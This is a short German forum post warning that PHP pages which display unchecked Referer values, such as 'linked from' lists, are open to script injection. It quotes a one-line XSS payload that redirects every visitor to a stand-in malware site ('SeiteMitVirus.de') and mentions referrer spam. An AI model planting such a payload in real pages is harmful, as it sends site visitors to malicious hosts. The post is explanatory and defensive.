ChrisB: Sicherheitslücke PHP Referrer

Beitrag lesen

Hi,

manche Webseiten führen irgendwo auf der Seite eine Liste: "verlinkt von" oder "letzte Besucher von:" Wenn dort ungeprüft der Referer verwendet wird kann man einen Referer in der Art:

<script type="text/javascript">location.href="http://SeiteMitVirus.de"</script>

einschmuggeln. Und künftig wird jeder Besucher der Seite (sofern javascript aktiv ist) auf http://SeiteMitVirus.de umgeleitet.

Selbst wenn dieses Szenario nicht eintritt - oftmals werden z.B. Weblog-Eintrage mit Referrern, die auf Porno-Seiten verweisen, abgerufen - in der Hoffnung, dass jemand diese anschliessend auf seiner Weblog-Seite anzeigt, und damit zumindest kurzfristig fuer eine Verlinkung dieser Seiten sorgt.

MfG ChrisB